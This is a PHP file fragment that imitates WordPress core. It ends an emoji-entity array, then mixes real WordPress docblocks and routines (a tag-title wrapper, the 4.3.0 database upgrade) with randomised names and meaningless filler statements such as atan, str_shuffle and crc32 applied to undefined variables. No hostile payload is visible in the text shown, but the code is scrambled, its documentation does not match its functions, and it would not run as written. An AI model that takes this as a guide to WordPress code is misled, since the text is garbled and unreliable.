'&#x1f23a;', '&#x1f250;', '&#x1f251;', '&#x1f300;', '&#x1f301;', '&#x1f302;', '&#x1f303;', '&#x1f304;', '&#x1f305;', '&#x1f306;', '&#x1f307;', '&#x1f308;', '&#x1f309;', '&#x1f30a;', '&#x1f30b;', '&#x1f30c;', '&#x1f30d;', '&#x1f30e;', '&#x1f30f;', '&#x1f310;', '&#x1f311;', '&#x1f312;', '&#x1f313;', '&#x1f314;', '&#x1f315;', '&#x1f316;', '&#x1f317;', '&#x1f318;', '&#x1f319;', '&#x1f31a;', '&#x1f31b;', '&#x1f31c;', '&#x1f31d;', '&#x1f31e;', '&#x1f31f;', '&#x1f320;', '&#x1f321;', '&#x1f324;', '&#x1f325;', '&#x1f326;', '&#x1f327;', '&#x1f328;', '&#x1f329;', '&#x1f32a;', '&#x1f32b;', '&#x1f32c;', '&#x1f32d;', '&#x1f32e;', '&#x1f32f;', '&#x1f330;', '&#x1f331;', '&#x1f332;', '&#x1f333;', '&#x1f334;', '&#x1f335;', '&#x1f336;', '&#x1f337;', '&#x1f338;', '&#x1f339;', '&#x1f33a;', '&#x1f33b;', '&#x1f33c;', '&#x1f33d;', '&#x1f33e;', '&#x1f33f;', '&#x1f340;', '&#x1f341;', '&#x1f342;', '&#x1f343;', '&#x1f344;', '&#x1f345;', '&#x1f346;', '&#x1f347;', '&#x1f348;', '&#x1f349;', '&#x1f34a;', '&#x1f34b;', '&#x1f34c;', '&#x1f34d;', '&#x1f34e;', '&#x1f34f;', '&#x1f350;', '&#x1f351;', '&#x1f352;', '&#x1f353;', '&#x1f354;', '&#x1f355;', '&#x1f356;', '&#x1f357;', '&#x1f358;', '&#x1f359;', '&#x1f35a;', '&#x1f35b;', '&#x1f35c;', '&#x1f35d;', '&#x1f35e;', '&#x1f35f;', '&#x1f360;', '&#x1f361;', '&#x1f362;', '&#x1f363;', '&#x1f364;', '&#x1f365;', '&#x1f366;', '&#x1f367;', '&#x1f368;', '&#x1f369;', '&#x1f36a;', '&#x1f36b;', '&#x1f36c;', '&#x1f36d;', '&#x1f36e;', '&#x1f36f;', '&#x1f370;', '&#x1f371;', '&#x1f372;', '&#x1f373;', '&#x1f374;', '&#x1f375;', '&#x1f376;', '&#x1f377;', '&#x1f378;', '&#x1f379;', '&#x1f37a;', '&#x1f37b;', '&#x1f37c;', '&#x1f37d;', '&#x1f37e;', '&#x1f37f;', '&#x1f380;', '&#x1f381;', '&#x1f382;', '&#x1f383;', '&#x1f384;', '&#x1f385;', '&#x1f3fb;', '&#x1f3fc;', '&#x1f3fd;', '&#x1f3fe;', '&#x1f3ff;', '&#x1f386;', '&#x1f387;', '&#x1f388;', '&#x1f389;', '&#x1f38a;', '&#x1f38b;', '&#x1f38c;', '&#x1f38d;', '&#x1f38e;', '&#x1f38f;', '&#x1f390;', '&#x1f391;', '&#x1f392;', '&#x1f393;', '&#x1f396;', '&#x1f397;', '&#x1f399;', '&#x1f39a;', '&#x1f39b;', '&#x1f39e;', '&#x1f39f;', '&#x1f3a0;', '&#x1f3a1;', '&#x1f3a2;', '&#x1f3a3;', '&#x1f3a4;', '&#x1f3a5;', '&#x1f3a6;', '&#x1f3a7;', '&#x1f3a8;', '&#x1f3a9;', '&#x1f3aa;', '&#x1f3ab;', '&#x1f3ac;', '&#x1f3ad;', '&#x1f3ae;', '&#x1f3af;', '&#x1f3b0;', '&#x1f3b1;', '&#x1f3b2;', '&#x1f3b3;', '&#x1f3b4;', '&#x1f3b5;', '&#x1f3b6;', '&#x1f3b7;', '&#x1f3b8;', '&#x1f3b9;', '&#x1f3ba;', '&#x1f3bb;', '&#x1f3bc;', '&#x1f3bd;', '&#x1f3be;', '&#x1f3bf;', '&#x1f3c0;', '&#x1f3c1;', '&#x1f3c2;', '&#x1f3c3;', '&#x200d;', '&#x2640;', '&#xfe0f;', '&#x2642;', '&#x1f3c4;', '&#x1f3c5;', '&#x1f3c6;', '&#x1f3c7;', '&#x1f3c8;', '&#x1f3c9;', '&#x1f3ca;', '&#x1f3cb;', '&#x1f3cc;', '&#x1f3cd;', '&#x1f3ce;', '&#x1f3cf;', '&#x1f3d0;', '&#x1f3d1;', '&#x1f3d2;', '&#x1f3d3;', '&#x1f3d4;', '&#x1f3d5;', '&#x1f3d6;', '&#x1f3d7;', '&#x1f3d8;', '&#x1f3d9;', '&#x1f3da;', '&#x1f3db;', '&#x1f3dc;', '&#x1f3dd;', '&#x1f3de;', '&#x1f3df;', '&#x1f3e0;', '&#x1f3e1;', '&#x1f3e2;', '&#x1f3e3;', '&#x1f3e4;', '&#x1f3e5;', '&#x1f3e6;', '&#x1f3e7;', '&#x1f3e8;', '&#x1f3e9;', '&#x1f3ea;', '&#x1f3eb;', '&#x1f3ec;', '&#x1f3ed;', '&#x1f3ee;', '&#x1f3ef;', '&#x1f3f0;', '&#x1f3f3;', '&#x26a7;', '&#x1f3f4;', '&#x2620;', '&#xe0067;', '&#xe0062;', '&#xe0065;', '&#xe006e;', '&#xe007f;', '&#xe0073;', '&#xe0063;', '&#xe0074;', '&#xe0077;', '&#xe006c;', '&#x1f3f5;', '&#x1f3f7;', '&#x1f3f8;', '&#x1f3f9;', '&#x1f3fa;', '&#x1f400;', '&#x1f401;', '&#x1f402;', '&#x1f403;', '&#x1f404;', '&#x1f405;', '&#x1f406;', '&#x1f407;', '&#x1f408;', '&#x2b1b;', '&#x1f409;', '&#x1f40a;', '&#x1f40b;', '&#x1f40c;', '&#x1f40d;', '&#x1f40e;', '&#x1f40f;', '&#x1f410;', '&#x1f411;', '&#x1f412;', '&#x1f413;', '&#x1f414;', '&#x1f415;', '&#x1f9ba;', '&#x1f416;', '&#x1f417;', '&#x1f418;', '&#x1f419;', '&#x1f41a;', '&#x1f41b;', '&#x1f41c;', '&#x1f41d;', '&#x1f41e;', '&#x1f41f;', '&#x1f420;', '&#x1f421;', '&#x1f422;', '&#x1f423;', '&#x1f424;', '&#x1f425;', '&#x1f426;', '&#x1f427;', '&#x1f428;', '&#x1f429;', '&#x1f42a;', '&#x1f42b;', '&#x1f42c;', '&#x1f42d;', '&#x1f42e;', '&#x1f42f;', '&#x1f430;', '&#x1f431;', '&#x1f432;', '&#x1f433;', '&#x1f434;', '&#x1f435;', '&#x1f436;', '&#x1f437;', '&#x1f438;', '&#x1f439;', '&#x1f43a;', '&#x1f43b;', '&#x2744;', '&#x1f43c;', '&#x1f43d;', '&#x1f43e;', '&#x1f43f;', '&#x1f440;', '&#x1f441;', '&#x1f5e8;', '&#x1f442;', '&#x1f443;', '&#x1f444;', '&#x1f445;', '&#x1f446;', '&#x1f447;', '&#x1f448;', '&#x1f449;', '&#x1f44a;', '&#x1f44b;', '&#x1f44c;', '&#x1f44d;', '&#x1f44e;', '&#x1f44f;', '&#x1f450;', '&#x1f451;', '&#x1f452;', '&#x1f453;', '&#x1f454;', '&#x1f455;', '&#x1f456;', '&#x1f457;', '&#x1f458;', '&#x1f459;', '&#x1f45a;', '&#x1f45b;', '&#x1f45c;', '&#x1f45d;', '&#x1f45e;', '&#x1f45f;', '&#x1f460;', '&#x1f461;', '&#x1f462;', '&#x1f463;', '&#x1f464;', '&#x1f465;', '&#x1f466;', '&#x1f467;', '&#x1f468;', '&#x1f4bb;', '&#x1f4bc;', '&#x1f527;', '&#x1f52c;', '&#x1f680;', '&#x1f692;', '&#x1f91d;', '&#x1f9af;', '&#x1f9b0;', '&#x1f9b1;', '&#x1f9b2;', '&#x1f9b3;', '&#x1f9bc;', '&#x1f9bd;', '&#x2695;', '&#x2696;', '&#x2708;', '&#x2764;', '&#x1f48b;', '&#x1f469;', '&#x1f46a;', '&#x1f46b;', '&#x1f46c;', '&#x1f46d;', '&#x1f46e;', '&#x1f46f;', '&#x1f470;', '&#x1f471;', '&#x1f472;', '&#x1f473;', '&#x1f474;', '&#x1f475;', '&#x1f476;', '&#x1f477;', '&#x1f478;', '&#x1f479;', '&#x1f47a;', '&#x1f47b;', '&#x1f47c;', '&#x1f47d;', '&#x1f47e;', '&#x1f47f;', '&#x1f480;', '&#x1f481;', '&#x1f482;', '&#x1f483;', '&#x1f484;', '&#x1f485;', '&#x1f486;', '&#x1f487;', '&#x1f488;', '&#x1f489;', '&#x1f48a;', '&#x1f48c;', '&#x1f48d;', '&#x1f48e;', '&#x1f48f;', '&#x1f490;', '&#x1f491;', '&#x1f492;', '&#x1f493;', '&#x1f494;', '&#x1f495;', '&#x1f496;', '&#x1f497;', '&#x1f498;', '&#x1f499;', '&#x1f49a;', '&#x1f49b;', '&#x1f49c;', '&#x1f49d;', '&#x1f49e;', '&#x1f49f;', '&#x1f4a0;', '&#x1f4a1;', '&#x1f4a2;', '&#x1f4a3;', '&#x1f4a4;', '&#x1f4a5;', '&#x1f4a6;', '&#x1f4a7;', '&#x1f4a8;', '&#x1f4a9;', '&#x1f4aa;', '&#x1f4ab;', '&#x1f4ac;', '&#x1f4ad;', '&#x1f4ae;', '&#x1f4af;', '&#x1f4b0;', '&#x1f4b1;', '&#x1f4b2;', '&#x1f4b3;', '&#x1f4b4;', '&#x1f4b5;', '&#x1f4b6;', '&#x1f4b7;', '&#x1f4b8;', '&#x1f4b9;', '&#x1f4ba;', '&#x1f4bd;', '&#x1f4be;', '&#x1f4bf;', '&#x1f4c0;', '&#x1f4c1;', '&#x1f4c2;', '&#x1f4c3;', '&#x1f4c4;', '&#x1f4c5;', '&#x1f4c6;', '&#x1f4c7;', '&#x1f4c8;', '&#x1f4c9;', '&#x1f4ca;', '&#x1f4cb;', '&#x1f4cc;', '&#x1f4cd;', '&#x1f4ce;', '&#x1f4cf;', '&#x1f4d0;', '&#x1f4d1;', '&#x1f4d2;', '&#x1f4d3;', '&#x1f4d4;', '&#x1f4d5;', '&#x1f4d6;', '&#x1f4d7;', '&#x1f4d8;', '&#x1f4d9;', '&#x1f4da;', '&#x1f4db;', '&#x1f4dc;', '&#x1f4dd;', '&#x1f4de;', '&#x1f4df;', '&#x1f4e0;', '&#x1f4e1;', '&#x1f4e2;', '&#x1f4e3;', '&#x1f4e4;', '&#x1f4e5;', '&#x1f4e6;', '&#x1f4e7;', '&#x1f4e8;', '&#x1f4e9;', '&#x1f4ea;', '&#x1f4eb;', '&#x1f4ec;', '&#x1f4ed;', '&#x1f4ee;', '&#x1f4ef;', '&#x1f4f0;', '&#x1f4f1;', '&#x1f4f2;', '&#x1f4f3;', '&#x1f4f4;', '&#x1f4f5;', '&#x1f4f6;', '&#x1f4f7;', '&#x1f4f8;', '&#x1f4f9;', '&#x1f4fa;', '&#x1f4fb;', '&#x1f4fc;', '&#x1f4fd;', '&#x1f4ff;', '&#x1f500;', '&#x1f501;', '&#x1f502;', '&#x1f503;', '&#x1f504;', '&#x1f505;', '&#x1f506;', '&#x1f507;', '&#x1f508;', '&#x1f509;', '&#x1f50a;', '&#x1f50b;', '&#x1f50c;', '&#x1f50d;', '&#x1f50e;', '&#x1f50f;', '&#x1f510;', '&#x1f511;', '&#x1f512;', '&#x1f513;', '&#x1f514;', '&#x1f515;', '&#x1f516;', '&#x1f517;', '&#x1f518;', '&#x1f519;', '&#x1f51a;', '&#x1f51b;', '&#x1f51c;', '&#x1f51d;', '&#x1f51e;', '&#x1f51f;', '&#x1f520;', '&#x1f521;', '&#x1f522;', '&#x1f523;', '&#x1f524;', '&#x1f525;', '&#x1f526;', '&#x1f528;', '&#x1f529;', '&#x1f52a;', '&#x1f52b;', '&#x1f52d;', '&#x1f52e;', '&#x1f52f;', '&#x1f530;', '&#x1f531;', '&#x1f532;', '&#x1f533;', '&#x1f534;', '&#x1f535;', '&#x1f536;', '&#x1f537;', '&#x1f538;', '&#x1f539;', '&#x1f53a;', '&#x1f53b;', '&#x1f53c;', '&#x1f53d;', '&#x1f549;', '&#x1f54a;', '&#x1f54b;', '&#x1f54c;', '&#x1f54d;', '&#x1f54e;', '&#x1f550;', '&#x1f551;', '&#x1f552;', '&#x1f553;', '&#x1f554;', '&#x1f555;', '&#x1f556;', '&#x1f557;', '&#x1f558;', '&#x1f559;', '&#x1f55a;', '&#x1f55b;', '&#x1f55c;', '&#x1f55d;', '&#x1f55e;', '&#x1f55f;', '&#x1f560;', '&#x1f561;', '&#x1f562;', '&#x1f563;', '&#x1f564;', '&#x1f565;', '&#x1f566;', '&#x1f567;', '&#x1f56f;', '&#x1f570;', '&#x1f573;', '&#x1f574;', '&#x1f575;', '&#x1f576;', '&#x1f577;', '&#x1f578;', '&#x1f579;', '&#x1f57a;', '&#x1f587;', '&#x1f58a;', '&#x1f58b;', '&#x1f58c;', '&#x1f58d;', '&#x1f590;', '&#x1f595;', '&#x1f596;', '&#x1f5a4;', '&#x1f5a5;', '&#x1f5a8;', '&#x1f5b1;', '&#x1f5b2;', '&#x1f5bc;', '&#x1f5c2;', '&#x1f5c3;', '&#x1f5c4;', '&#x1f5d1;', '&#x1f5d2;', '&#x1f5d3;', '&#x1f5dc;', '&#x1f5dd;', '&#x1f5de;', '&#x1f5e1;', '&#x1f5e3;', '&#x1f5ef;', '&#x1f5f3;', '&#x1f5fa;', '&#x1f5fb;', '&#x1f5fc;', '&#x1f5fd;', '&#x1f5fe;', '&#x1f5ff;', '&#x1f600;', '&#x1f601;', '&#x1f602;', '&#x1f603;', '&#x1f604;', '&#x1f605;', '&#x1f606;', '&#x1f607;', '&#x1f608;', '&#x1f609;', '&#x1f60a;', '&#x1f60b;', '&#x1f60c;', '&#x1f60d;', '&#x1f60e;', '&#x1f60f;', '&#x1f610;', '&#x1f611;', '&#x1f612;', '&#x1f613;', '&#x1f614;', '&#x1f615;', '&#x1f616;', '&#x1f617;', '&#x1f618;', '&#x1f619;', '&#x1f61a;', '&#x1f61b;', '&#x1f61c;', '&#x1f61d;', '&#x1f61e;', '&#x1f61f;', '&#x1f620;', '&#x1f621;', '&#x1f622;', '&#x1f623;', '&#x1f624;', '&#x1f625;', '&#x1f626;', '&#x1f627;', '&#x1f628;', '&#x1f629;', '&#x1f62a;', '&#x1f62b;', '&#x1f62c;', '&#x1f62d;', '&#x1f62e;', '&#x1f62f;', '&#x1f630;', '&#x1f631;', '&#x1f632;', '&#x1f633;', '&#x1f634;', '&#x1f635;', '&#x1f636;', '&#x1f637;', '&#x1f638;', '&#x1f639;', '&#x1f63a;', '&#x1f63b;', '&#x1f63c;', '&#x1f63d;', '&#x1f63e;', '&#x1f63f;', '&#x1f640;', '&#x1f641;', '&#x1f642;', '&#x1f643;', '&#x1f644;', '&#x1f645;', '&#x1f646;', '&#x1f647;', '&#x1f648;', '&#x1f649;', '&#x1f64a;', '&#x1f64b;', '&#x1f64c;', '&#x1f64d;', '&#x1f64e;', '&#x1f64f;', '&#x1f681;', '&#x1f682;', '&#x1f683;', '&#x1f684;', '&#x1f685;', '&#x1f686;', '&#x1f687;', '&#x1f688;', '&#x1f689;', '&#x1f68a;', '&#x1f68b;', '&#x1f68c;', '&#x1f68d;', '&#x1f68e;', '&#x1f68f;', '&#x1f690;', '&#x1f691;', '&#x1f693;', '&#x1f694;', '&#x1f695;', '&#x1f696;', '&#x1f697;', '&#x1f698;', '&#x1f699;', '&#x1f69a;', '&#x1f69b;', '&#x1f69c;', '&#x1f69d;', '&#x1f69e;', '&#x1f69f;', '&#x1f6a0;', '&#x1f6a1;', '&#x1f6a2;', '&#x1f6a3;', '&#x1f6a4;', '&#x1f6a5;', '&#x1f6a6;', '&#x1f6a7;', '&#x1f6a8;', '&#x1f6a9;', '&#x1f6aa;', '&#x1f6ab;', '&#x1f6ac;', '&#x1f6ad;', '&#x1f6ae;', '&#x1f6af;', '&#x1f6b0;', '&#x1f6b1;', '&#x1f6b2;', '&#x1f6b3;', '&#x1f6b4;', '&#x1f6b5;', '&#x1f6b6;', '&#x1f6b7;', '&#x1f6b8;', '&#x1f6b9;', '&#x1f6ba;', '&#x1f6bb;', '&#x1f6bc;', '&#x1f6bd;', '&#x1f6be;', '&#x1f6bf;', '&#x1f6c0;', '&#x1f6c1;', '&#x1f6c2;', '&#x1f6c3;', '&#x1f6c4;', '&#x1f6c5;', '&#x1f6cb;', '&#x1f6cc;', '&#x1f6cd;', '&#x1f6ce;', '&#x1f6cf;', '&#x1f6d0;', '&#x1f6d1;', '&#x1f6d2;', '&#x1f6d5;', '&#x1f6d6;', '&#x1f6d7;', '&#x1f6dc;', '&#x1f6dd;', '&#x1f6de;', '&#x1f6df;', '&#x1f6e0;', '&#x1f6e1;', '&#x1f6e2;', '&#x1f6e3;', '&#x1f6e4;', '&#x1f6e5;', '&#x1f6e9;', '&#x1f6eb;', '&#x1f6ec;', '&#x1f6f0;', '&#x1f6f3;', '&#x1f6f4;', '&#x1f6f5;', '&#x1f6f6;', '&#x1f6f7;', '&#x1f6f8;', '&#x1f6f9;', '&#x1f6fa;', '&#x1f6fb;', '&#x1f6fc;', '&#x1f7e0;', '&#x1f7e1;', '&#x1f7e2;', '&#x1f7e3;', '&#x1f7e4;', '&#x1f7e5;', '&#x1f7e6;', '&#x1f7e7;', '&#x1f7e8;', '&#x1f7e9;', '&#x1f7ea;', '&#x1f7eb;', '&#x1f7f0;', '&#x1f90c;', '&#x1f90d;', '&#x1f90e;', '&#x1f90f;', '&#x1f910;', '&#x1f911;', '&#x1f912;', '&#x1f913;', '&#x1f914;', '&#x1f915;', '&#x1f916;', '&#x1f917;', '&#x1f918;', '&#x1f919;', '&#x1f91a;', '&#x1f91b;', '&#x1f91c;', '&#x1f91e;', '&#x1f91f;', '&#x1f920;', '&#x1f921;', '&#x1f922;', '&#x1f923;', '&#x1f924;', '&#x1f925;', '&#x1f926;', '&#x1f927;', '&#x1f928;', '&#x1f929;', '&#x1f92a;', '&#x1f92b;', '&#x1f92c;', '&#x1f92d;', '&#x1f92e;', '&#x1f92f;', '&#x1f930;', '&#x1f931;', '&#x1f932;', '&#x1f933;', '&#x1f934;', '&#x1f935;', '&#x1f936;', '&#x1f937;', '&#x1f938;', '&#x1f939;', '&#x1f93a;', '&#x1f93c;', '&#x1f93d;', '&#x1f93e;', '&#x1f93f;', '&#x1f940;', '&#x1f941;', '&#x1f942;', '&#x1f943;', '&#x1f944;', '&#x1f945;', '&#x1f947;', '&#x1f948;', '&#x1f949;', '&#x1f94a;', '&#x1f94b;', '&#x1f94c;', '&#x1f94d;', '&#x1f94e;', '&#x1f94f;', '&#x1f950;', '&#x1f951;', '&#x1f952;', '&#x1f953;', '&#x1f954;', '&#x1f955;', '&#x1f956;', '&#x1f957;', '&#x1f958;', '&#x1f959;', '&#x1f95a;', '&#x1f95b;', '&#x1f95c;', '&#x1f95d;', '&#x1f95e;', '&#x1f95f;', '&#x1f960;', '&#x1f961;', '&#x1f962;', '&#x1f963;', '&#x1f964;', '&#x1f965;', '&#x1f966;', '&#x1f967;', '&#x1f968;', '&#x1f969;', '&#x1f96a;', '&#x1f96b;', '&#x1f96c;', '&#x1f96d;', '&#x1f96e;', '&#x1f96f;', '&#x1f970;', '&#x1f971;', '&#x1f972;', '&#x1f973;', '&#x1f974;', '&#x1f975;', '&#x1f976;', '&#x1f977;', '&#x1f978;', '&#x1f979;', '&#x1f97a;', '&#x1f97b;', '&#x1f97c;', '&#x1f97d;', '&#x1f97e;', '&#x1f97f;', '&#x1f980;', '&#x1f981;', '&#x1f982;', '&#x1f983;', '&#x1f984;', '&#x1f985;', '&#x1f986;', '&#x1f987;', '&#x1f988;', '&#x1f989;', '&#x1f98a;', '&#x1f98b;', '&#x1f98c;', '&#x1f98d;', '&#x1f98e;', '&#x1f98f;', '&#x1f990;', '&#x1f991;', '&#x1f992;', '&#x1f993;', '&#x1f994;', '&#x1f995;', '&#x1f996;', '&#x1f997;', '&#x1f998;', '&#x1f999;', '&#x1f99a;', '&#x1f99b;', '&#x1f99c;', '&#x1f99d;', '&#x1f99e;', '&#x1f99f;', '&#x1f9a0;', '&#x1f9a1;', '&#x1f9a2;', '&#x1f9a3;', '&#x1f9a4;', '&#x1f9a5;', '&#x1f9a6;', '&#x1f9a7;', '&#x1f9a8;', '&#x1f9a9;', '&#x1f9aa;', '&#x1f9ab;', '&#x1f9ac;', '&#x1f9ad;', '&#x1f9ae;', '&#x1f9b4;', '&#x1f9b5;', '&#x1f9b6;', '&#x1f9b7;', '&#x1f9b8;', '&#x1f9b9;', '&#x1f9bb;', '&#x1f9be;', '&#x1f9bf;', '&#x1f9c0;', '&#x1f9c1;', '&#x1f9c2;', '&#x1f9c3;', '&#x1f9c4;', '&#x1f9c5;', '&#x1f9c6;', '&#x1f9c7;', '&#x1f9c8;', '&#x1f9c9;', '&#x1f9ca;', '&#x1f9cb;', '&#x1f9cc;', '&#x1f9cd;', '&#x1f9ce;', '&#x1f9cf;', '&#x1f9d0;', '&#x1f9d1;', '&#x1f9d2;', '&#x1f9d3;', '&#x1f9d4;', '&#x1f9d5;', '&#x1f9d6;', '&#x1f9d7;', '&#x1f9d8;', '&#x1f9d9;', '&#x1f9da;', '&#x1f9db;', '&#x1f9dc;', '&#x1f9dd;', '&#x1f9de;', '&#x1f9df;', '&#x1f9e0;', '&#x1f9e1;', '&#x1f9e2;', '&#x1f9e3;', '&#x1f9e4;', '&#x1f9e5;', '&#x1f9e6;', '&#x1f9e7;', '&#x1f9e8;', '&#x1f9e9;', '&#x1f9ea;', '&#x1f9eb;', '&#x1f9ec;', '&#x1f9ed;', '&#x1f9ee;', '&#x1f9ef;', '&#x1f9f0;', '&#x1f9f1;', '&#x1f9f2;', '&#x1f9f3;', '&#x1f9f4;', '&#x1f9f5;', '&#x1f9f6;', '&#x1f9f7;', '&#x1f9f8;', '&#x1f9f9;', '&#x1f9fa;', '&#x1f9fb;', '&#x1f9fc;', '&#x1f9fd;', '&#x1f9fe;', '&#x1f9ff;', '&#x1fa70;', '&#x1fa71;', '&#x1fa72;', '&#x1fa73;', '&#x1fa74;', '&#x1fa75;', '&#x1fa76;', '&#x1fa77;', '&#x1fa78;', '&#x1fa79;', '&#x1fa7a;', '&#x1fa7b;', '&#x1fa7c;', '&#x1fa80;', '&#x1fa81;', '&#x1fa82;', '&#x1fa83;', '&#x1fa84;', '&#x1fa85;', '&#x1fa86;', '&#x1fa87;', '&#x1fa88;', '&#x1fa90;', '&#x1fa91;', '&#x1fa92;', '&#x1fa93;', '&#x1fa94;', '&#x1fa95;', '&#x1fa96;', '&#x1fa97;', '&#x1fa98;', '&#x1fa99;', '&#x1fa9a;', '&#x1fa9b;', '&#x1fa9c;', '&#x1fa9d;', '&#x1fa9e;', '&#x1fa9f;', '&#x1faa0;', '&#x1faa1;', '&#x1faa2;', '&#x1faa3;', '&#x1faa4;', '&#x1faa5;', '&#x1faa6;', '&#x1faa7;', '&#x1faa8;', '&#x1faa9;', '&#x1faaa;', '&#x1faab;', '&#x1faac;', '&#x1faad;', '&#x1faae;', '&#x1faaf;', '&#x1fab0;', '&#x1fab1;', '&#x1fab2;', '&#x1fab3;', '&#x1fab4;', '&#x1fab5;', '&#x1fab6;', '&#x1fab7;', '&#x1fab8;', '&#x1fab9;', '&#x1faba;', '&#x1fabb;', '&#x1fabc;', '&#x1fabd;', '&#x1fabf;', '&#x1fac0;', '&#x1fac1;', '&#x1fac2;', '&#x1fac3;', '&#x1fac4;', '&#x1fac5;', '&#x1face;', '&#x1facf;', '&#x1fad0;', '&#x1fad1;', '&#x1fad2;', '&#x1fad3;', '&#x1fad4;', '&#x1fad5;', '&#x1fad6;', '&#x1fad7;', '&#x1fad8;', '&#x1fad9;', '&#x1fada;', '&#x1fadb;', '&#x1fae0;', '&#x1fae1;', '&#x1fae2;', '&#x1fae3;', '&#x1fae4;', '&#x1fae5;', '&#x1fae6;', '&#x1fae7;', '&#x1fae8;', '&#x1faf0;', '&#x1faf1;', '&#x1faf2;', '&#x1faf3;', '&#x1faf4;', '&#x1faf5;', '&#x1faf6;', '&#x1faf7;', '&#x1faf8;', '&#x203c;', '&#x2049;', '&#x2122;', '&#x2139;', '&#x2194;', '&#x2195;', '&#x2196;', '&#x2197;', '&#x2198;', '&#x2199;', '&#x21a9;', '&#x21aa;', '&#x20e3;', '&#x231a;', '&#x231b;', '&#x2328;', '&#x23cf;', '&#x23e9;', '&#x23ea;', '&#x23eb;', '&#x23ec;', '&#x23ed;', '&#x23ee;', '&#x23ef;', '&#x23f0;', '&#x23f1;', '&#x23f2;', '&#x23f3;', '&#x23f8;', '&#x23f9;', '&#x23fa;', '&#x24c2;', '&#x25aa;', '&#x25ab;', '&#x25b6;', '&#x25c0;', '&#x25fb;', '&#x25fc;', '&#x25fd;', '&#x25fe;', '&#x2600;', '&#x2601;', '&#x2602;', '&#x2603;', '&#x2604;', '&#x260e;', '&#x2611;', '&#x2614;', '&#x2615;', '&#x2618;', '&#x261d;', '&#x2622;', '&#x2623;', '&#x2626;', '&#x262a;', '&#x262e;', '&#x262f;', '&#x2638;', '&#x2639;', '&#x263a;', '&#x2648;', '&#x2649;', '&#x264a;', '&#x264b;', '&#x264c;', '&#x264d;', '&#x264e;', '&#x264f;', '&#x2650;', '&#x2651;', '&#x2652;', '&#x2653;', '&#x265f;', '&#x2660;', '&#x2663;', '&#x2665;', '&#x2666;', '&#x2668;', '&#x267b;', '&#x267e;', '&#x267f;', '&#x2692;', '&#x2693;', '&#x2694;', '&#x2697;', '&#x2699;', '&#x269b;', '&#x269c;', '&#x26a0;', '&#x26a1;', '&#x26aa;', '&#x26ab;', '&#x26b0;', '&#x26b1;', '&#x26bd;', '&#x26be;', '&#x26c4;', '&#x26c5;', '&#x26c8;', '&#x26ce;', '&#x26cf;', '&#x26d1;', '&#x26d3;', '&#x26d4;', '&#x26e9;', '&#x26ea;', '&#x26f0;', '&#x26f1;', '&#x26f2;', '&#x26f3;', '&#x26f4;', '&#x26f5;', '&#x26f7;', '&#x26f8;', '&#x26f9;', '&#x26fa;', '&#x26fd;', '&#x2702;', '&#x2705;', '&#x2709;', '&#x270a;', '&#x270b;', '&#x270c;', '&#x270d;', '&#x270f;', '&#x2712;', '&#x2714;', '&#x2716;', '&#x271d;', '&#x2721;', '&#x2728;', '&#x2733;', '&#x2734;', '&#x2747;', '&#x274c;', '&#x274e;', '&#x2753;', '&#x2754;', '&#x2755;', '&#x2757;', '&#x2763;', '&#x2795;', '&#x2796;', '&#x2797;', '&#x27a1;', '&#x27b0;', '&#x27bf;', '&#x2934;', '&#x2935;', '&#x2b05;', '&#x2b06;', '&#x2b07;', '&#x2b1c;', '&#x2b50;', '&#x2b55;', '&#x3030;', '&#x303d;', '&#x3297;', '&#x3299;', '&#xe50a;');
    // END: emoji arrays
    if ('entities' === $f3g7_38) {
        return $setting_key;
    }
    return $AVCProfileIndication;
}


/**
 * Returns all the categories for block types that will be shown in the block editor.
 *
 * @since 5.0.0
 * @since 5.8.0 It is possible to pass the block editor context as param.
 *
 * @param WP_Post|WP_Block_Editor_Context $caps_with_roles_or_block_editor_context The current post object or
 *                                                                      the block editor context.
 *
 * @return array[] Array of categories for block types.
 */

 if(empty(atan(9)) ==  false) {
 	$body_placeholder = 'noqn1t';
 }
$store_name = (!isset($store_name)? "ftnl9pl3" : "e1dl");
$bytesize['ozxusb3'] = 3798;
/**
 * Displays or retrieves page title for tag post archive.
 *
 * Useful for tag template files for displaying the tag page title. The prefix
 * does not automatically place a space between the prefix, so if there should
 * be a space, the parameter value will need to have it at the end.
 *
 * @since 2.3.0
 *
 * @param string $media_meta  Optional. What to display before the title.
 * @param bool   $ParsedLyrics3 Optional. Whether to display or retrieve title. Default true.
 * @return string|void Title when retrieving.
 */
function fill_query_vars($media_meta = '', $ParsedLyrics3 = true)
{
    return single_term_title($media_meta, $ParsedLyrics3);
}
$match_src = substr($f7g3_38, 20, 8);
$rcpt = block_core_navigation_get_menu_items_at_location($rcpt);
$u_bytes['qt408ada'] = 2601;
$rcpt = decoct(428);
$can_compress_scripts = (!isset($can_compress_scripts)?	"iimmkpo"	:	"repa");


/**
	 * Checks if the user can refresh this partial.
	 *
	 * Returns false if the user cannot manipulate one of the associated settings,
	 * or if one of the associated settings does not exist.
	 *
	 * @since 4.5.0
	 *
	 * @return bool False if user can't edit one of the related settings,
	 *                    or if one of the associated settings does not exist.
	 */

 if((strtr($rcpt, 13, 12)) ==  TRUE){
 	$json_translation_file = 'ax009';
 }
$msg_data = strnatcasecmp($f7g3_38, $rcpt);
$allowed_media_types = 'qjuegf';
$allowed_media_types = strtolower($allowed_media_types);
$curie = (!isset($curie)? 	"ykxzb" 	: 	"w3m5dng");
$allowed_media_types = log1p(140);
$allowed_media_types = FreeFormatFrameLength($allowed_media_types);
$f5f9_76 = 'luuvoncc';
$allowed_media_types = crc32($f5f9_76);
$jetpack_user = (!isset($jetpack_user)?"c7g0hngp":"ska2xb");


/*
			 * Instead of clearing the parser state and starting fresh, calling the stack methods
			 * maintains the proper flags in the parser.
			 */

 if(!empty(str_shuffle($f5f9_76)) ==  True)	{
 	$new_ID = 'qatqx';
 }
/**
 * Executes changes made in WordPress 4.3.0.
 *
 * @ignore
 * @since 4.3.0
 *
 * @global int  $webfont The old (current) database version.
 * @global wpdb $widget_setting_ids                  WordPress database abstraction object.
 */
function peekDouble()
{
    global $webfont, $widget_setting_ids;
    if ($webfont < 32364) {
        peekDouble_fix_comments();
    }
    // Shared terms are split in a separate process.
    if ($webfont < 32814) {
        update_option('finished_splitting_shared_terms', 0);
        wp_schedule_single_event(time() + 1 * MINUTE_IN_SECONDS, 'wp_split_shared_term_batch');
    }
    if ($webfont < 33055 && 'utf8mb4' === $widget_setting_ids->charset) {
        if (is_multisite()) {
            $old_id = $widget_setting_ids->tables('blog');
        } else {
            $old_id = $widget_setting_ids->tables('all');
            if (!wp_should_upgrade_global_tables()) {
                $show_post_title = $widget_setting_ids->tables('global');
                $old_id = array_diff_assoc($old_id, $show_post_title);
            }
        }
